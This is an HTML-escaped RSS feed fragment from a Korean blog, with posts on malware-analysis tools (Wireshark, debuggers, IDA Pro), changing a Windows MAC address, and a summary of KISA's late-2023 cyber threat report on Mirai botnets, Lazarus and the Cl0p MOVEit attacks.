data-origin-height=&quot;784&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Wireshark&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;701&quot; data-origin-height=&quot;636&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bdRKGH/btsFlRDuwRB/Hd4z5AUNmwcFcqvCERXLB1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bdRKGH/btsFlRDuwRB/Hd4z5AUNmwcFcqvCERXLB1/img.png&quot; data-alt=&quot;TCP View&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bdRKGH/btsFlRDuwRB/Hd4z5AUNmwcFcqvCERXLB1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbdRKGH%2FbtsFlRDuwRB%2FHd4z5AUNmwcFcqvCERXLB1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;701&quot; height=&quot;636&quot; data-origin-width=&quot;701&quot; data-origin-height=&quot;636&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;TCP View&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;- 희생자 PC에 악성코드가 침투 후 공격자에게 수집한 정보를 네트워크를 통해서 보내거나 외부로부터 네트워크를 통해 명령을 받아 그 명령에 맞게 동작하기 때문에 네트워크의 변화를 실시간으로 감지하며 악성코드가 어떤 동작을 하는지 확인 가능.&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;5. 디버깅 도구를 이용해서&amp;nbsp;&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;디버거를 이용 동작하는 악성 실행 파일의 내부 상태를 점검&lt;br /&gt;&lt;span style=&quot;color: #333333; text-align: left;&quot;&gt;✔ 사용 도구:&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;b&gt;OLLY DBG, x64dbg, immunity debugger, WINDBG&lt;/b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;등​&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;869&quot; data-origin-height=&quot;629&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/qRo7t/btsFoeEz4Lm/6VlgktENdD26uBtkU7MDjk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/qRo7t/btsFoeEz4Lm/6VlgktENdD26uBtkU7MDjk/img.png&quot; data-alt=&quot;x64dbg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/qRo7t/btsFoeEz4Lm/6VlgktENdD26uBtkU7MDjk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FqRo7t%2FbtsFoeEz4Lm%2F6VlgktENdD26uBtkU7MDjk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;869&quot; height=&quot;629&quot; data-origin-width=&quot;869&quot; data-origin-height=&quot;629&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;x64dbg&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;파일이 어떻게 동작하는지 디버깅을 통해 확인 가능&lt;/p&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;3. 정적분석&lt;/b&gt;&lt;/h2&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;정적분석은 악성코드 파일을 디스어셈블하여 아주 세부적인 동작을 분석하는 단계&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;- 정적분석을 하는 방법은 실행파일 만을 가지고 프로그램의 구조를 역분석하는 &lt;b&gt;리버스 엔지니어링&lt;/b&gt;이라는 기술을 활용할 수 있습니다.&lt;br /&gt;&lt;br /&gt;1.&amp;nbsp; 실행파일을 디스어셈블리하여 악성코드 내부를 역공학&lt;br /&gt;&lt;span style=&quot;color: #333333; text-align: left;&quot;&gt;✔ 사용 도구:&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt; &lt;b&gt;IDA PRO&lt;/b&gt; 등&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;766&quot; data-origin-height=&quot;775&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/d9WsAN/btsFlUGPwbG/jzOgv6wkvyiYuzO3xiCpb1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/d9WsAN/btsFlUGPwbG/jzOgv6wkvyiYuzO3xiCpb1/img.png&quot; data-alt=&quot;IDA 화면&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/d9WsAN/btsFlUGPwbG/jzOgv6wkvyiYuzO3xiCpb1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fd9WsAN%2FbtsFlUGPwbG%2FjzOgv6wkvyiYuzO3xiCpb1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;766&quot; height=&quot;775&quot; data-origin-width=&quot;766&quot; data-origin-height=&quot;775&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;IDA 화면&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;​&lt;/p&gt;</description>
      <category>악성코드</category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/649</guid>
      <comments>https://jennana.tistory.com/649#entry649comment</comments>
      <pubDate>Fri, 1 Mar 2024 17:39:31 +0900</pubDate>
    </item>
    <item>
      <title>[윈도우] 컴퓨터 맥 주소(MAC address) 변경하기</title>
      <link>https://jennana.tistory.com/648</link>
      <description>&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;[윈도우]&amp;nbsp;컴퓨터&amp;nbsp;맥&amp;nbsp;주소(MAC&amp;nbsp;address)&amp;nbsp;변경하기&lt;/h2&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style7&quot; /&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;* 임시적으로 바꾸는 것이고 설정을 풀면 원래대로 돌아옵니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1. 제어판 &amp;gt; &lt;b&gt;장치 관리자&lt;/b&gt; &amp;gt; &lt;b&gt;네트워크 어댑터&lt;/b&gt; &amp;gt; 원하는 네트워크 어댑터 선택&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;* 네트워크 어댑터의 종류 다양하니 잘 선택&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;mac1.jpg&quot; data-origin-width=&quot;780&quot; data-origin-height=&quot;572&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/vxlQB/btsEIRhZc0R/DDMpJZAIwlD2SMZTQaiCC0/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/vxlQB/btsEIRhZc0R/DDMpJZAIwlD2SMZTQaiCC0/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/vxlQB/btsEIRhZc0R/DDMpJZAIwlD2SMZTQaiCC0/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FvxlQB%2FbtsEIRhZc0R%2FDDMpJZAIwlD2SMZTQaiCC0%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;780&quot; height=&quot;572&quot; data-filename=&quot;mac1.jpg&quot; data-origin-width=&quot;780&quot; data-origin-height=&quot;572&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2. 해당 어댑터 오른쪽 클릭 &amp;gt; &lt;b&gt;[속성]&lt;/b&gt; 클릭&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;mac2.jpg&quot; data-origin-width=&quot;770&quot; data-origin-height=&quot;555&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/ckue0L/btsEEzjoVRh/Am7NAjoDBdBPlc12w6dMF1/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/ckue0L/btsEEzjoVRh/Am7NAjoDBdBPlc12w6dMF1/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/ckue0L/btsEEzjoVRh/Am7NAjoDBdBPlc12w6dMF1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fckue0L%2FbtsEEzjoVRh%2FAm7NAjoDBdBPlc12w6dMF1%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;770&quot; height=&quot;555&quot; data-filename=&quot;mac2.jpg&quot; data-origin-width=&quot;770&quot; data-origin-height=&quot;555&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3. [고급] 탭 선택&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;mac3.jpg&quot; data-origin-width=&quot;465&quot; data-origin-height=&quot;518&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/wqSHM/btsEFO0RYWk/i4On0pkPVhKS2BSROF0X7K/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/wqSHM/btsEFO0RYWk/i4On0pkPVhKS2BSROF0X7K/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/wqSHM/btsEFO0RYWk/i4On0pkPVhKS2BSROF0X7K/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FwqSHM%2FbtsEFO0RYWk%2Fi4On0pkPVhKS2BSROF0X7K%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;465&quot; height=&quot;518&quot; data-filename=&quot;mac3.jpg&quot; data-origin-width=&quot;465&quot; data-origin-height=&quot;518&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;4. &quot;네트워크 주소(Network Address)&quot; 또는 &quot;로컬 관리 주소(Locally Administerekd Address)&quot; 선택&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;mac4.jpg&quot; data-origin-width=&quot;465&quot; data-origin-height=&quot;518&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dQrq34/btsEJczB6zI/6GqDtS77QVis4ZMac1jkrk/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dQrq34/btsEJczB6zI/6GqDtS77QVis4ZMac1jkrk/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dQrq34/btsEJczB6zI/6GqDtS77QVis4ZMac1jkrk/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdQrq34%2FbtsEJczB6zI%2F6GqDtS77QVis4ZMac1jkrk%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;465&quot; height=&quot;518&quot; data-filename=&quot;mac4.jpg&quot; data-origin-width=&quot;465&quot; data-origin-height=&quot;518&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;5. 값(Value)에 변경하고 싶은 MAC 주소 입력&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;mac5.jpg&quot; data-origin-width=&quot;465&quot; data-origin-height=&quot;518&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dNQUpy/btsEHIS30ik/ODvlwvGPZmLwdUiH28LZq1/img.jpg&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dNQUpy/btsEHIS30ik/ODvlwvGPZmLwdUiH28LZq1/img.jpg&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dNQUpy/btsEHIS30ik/ODvlwvGPZmLwdUiH28LZq1/img.jpg&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdNQUpy%2FbtsEHIS30ik%2FODvlwvGPZmLwdUiH28LZq1%2Fimg.jpg&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;465&quot; height=&quot;518&quot; data-filename=&quot;mac5.jpg&quot; data-origin-width=&quot;465&quot; data-origin-height=&quot;518&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;6. 컴퓨터 재부팅&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;* WIFI 등 무선네트워크도 동일한 방법으로 변경 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;* MAC 주소 확인하는 방법 : CMD &amp;gt; ipconfig /all 에서 물리적 주소(Physical Address) 확인&lt;/p&gt;</description>
      <category>컴퓨터 문제해결/  IT 팁</category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/648</guid>
      <comments>https://jennana.tistory.com/648#entry648comment</comments>
      <pubDate>Sun, 11 Feb 2024 02:00:49 +0900</pubDate>
    </item>
    <item>
      <title>[KISA] 사이버 위협 동향 보고서(2023년 하반기)</title>
      <link>https://jennana.tistory.com/647</link>
      <description>&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h1 class=&quot;text-center font-bold text-2xl lg:text-3xl&quot; style=&quot;text-align: center;&quot;&gt;&lt;b&gt;[KISA] 사이버 위협 동향 보고서(2023년 하반기)&lt;/b&gt;&lt;/h1&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #3c3c3c; text-align: center;&quot;&gt;- 한국인터넷진흥원&lt;/span&gt;&lt;span style=&quot;color: #3c3c3c; text-align: center;&quot;&gt;(KISA)에서 발간한 보고서&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;edited_blob&quot; data-origin-width=&quot;630&quot; data-origin-height=&quot;865&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cMRupQ/btsEFfdl4GH/FuxpkrqKcFO7QziFkVFBt1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cMRupQ/btsEFfdl4GH/FuxpkrqKcFO7QziFkVFBt1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cMRupQ/btsEFfdl4GH/FuxpkrqKcFO7QziFkVFBt1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcMRupQ%2FbtsEFfdl4GH%2FFuxpkrqKcFO7QziFkVFBt1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;630&quot; height=&quot;865&quot; data-filename=&quot;edited_blob&quot; data-origin-width=&quot;630&quot; data-origin-height=&quot;865&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h3 style=&quot;background-color: #ffffff; color: #444444; text-align: center;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;Part.1 사이버 위협 동향&lt;/b&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;1-1. 침해사고 현황&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;775&quot; data-origin-height=&quot;350&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/zvtlR/btsEF3wHXM5/vIK5NNwwQdUdgPwe05DwVK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/zvtlR/btsEF3wHXM5/vIK5NNwwQdUdgPwe05DwVK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/zvtlR/btsEF3wHXM5/vIK5NNwwQdUdgPwe05DwVK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FzvtlR%2FbtsEF3wHXM5%2FvIK5NNwwQdUdgPwe05DwVK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;775&quot; height=&quot;350&quot; data-origin-width=&quot;775&quot; data-origin-height=&quot;350&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;802&quot; data-origin-height=&quot;377&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b9byeZ/btsEE1l3h8p/i2nW7vaEXlLKZfSy8RJODk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b9byeZ/btsEE1l3h8p/i2nW7vaEXlLKZfSy8RJODk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b9byeZ/btsEE1l3h8p/i2nW7vaEXlLKZfSy8RJODk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb9byeZ%2FbtsEE1l3h8p%2Fi2nW7vaEXlLKZfSy8RJODk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;802&quot; height=&quot;377&quot; data-origin-width=&quot;802&quot; data-origin-height=&quot;377&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;1-2. IoT 봇넷 위협 동향&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; - IP 카메라용 DKR(Digital Video Recorder) 제품으로 미라이(Mirai) 악성코드 전파 및 DDoS 공격 시도가 탐지되고 있음.&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; - 9월부터 퍼이고 새로운 DDoS 네트워크가 발견, 일일 감연단말 IP 수는 일 평균 22개씩 누적되어 최대 1천 8백여 개&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; - 대부분의 CPU 아키텍처에 영향을 미치고, 악성코드가 설치되도록 스크립트 파일 형태로 배포&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;709&quot; data-origin-height=&quot;292&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/kU0hg/btsEKF2FRDi/Ruhkltlroy0iqWggl3JLQk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/kU0hg/btsEKF2FRDi/Ruhkltlroy0iqWggl3JLQk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/kU0hg/btsEKF2FRDi/Ruhkltlroy0iqWggl3JLQk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkU0hg%2FbtsEKF2FRDi%2FRuhkltlroy0iqWggl3JLQk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;709&quot; height=&quot;292&quot; data-origin-width=&quot;709&quot; data-origin-height=&quot;292&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;* 네트워크 공격방식 : 킬러 모듈을 이용해 SSH, HTTP 등 같은 서비스 종료시켜 IoT 기기를 사용할 수 없게 만들고, 감염여부를 숨기기 위해 프로세스 이름을 sshd로 변경, 메모리에 복호화된 데이터가 남는 것을 방지하기 위해 사용한 데이터를 다시 암호화하는 과정 추가.&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;1-3. 보안취약점 및 신고포상제 동향&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;524&quot; data-origin-height=&quot;528&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cfavxB/btsEHH0We4j/IWbASxcmr4kUryx8miTMC0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cfavxB/btsEHH0We4j/IWbASxcmr4kUryx8miTMC0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cfavxB/btsEHH0We4j/IWbASxcmr4kUryx8miTMC0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcfavxB%2FbtsEHH0We4j%2FIWbASxcmr4kUryx8miTMC0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;524&quot; height=&quot;528&quot; data-origin-width=&quot;524&quot; data-origin-height=&quot;528&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;1-4. 라자루스(Lazarus) 공격 그룹의 특징 및 전망&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h3 style=&quot;background-color: #ffffff; color: #444444; text-align: center;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;Part.2 전문가 컬럼&lt;/b&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;2-1. 이글루코퍼레이션 김미희 팀장&lt;/p&gt;
&lt;p style=&quot;background-color: #ffffff; color: #444444; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #444444; text-align: start;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;:&lt;span&gt; 제로데이 취약점을 악용한 랜섬웨어(Cl0p) 공격, MOVEit Transfer &lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
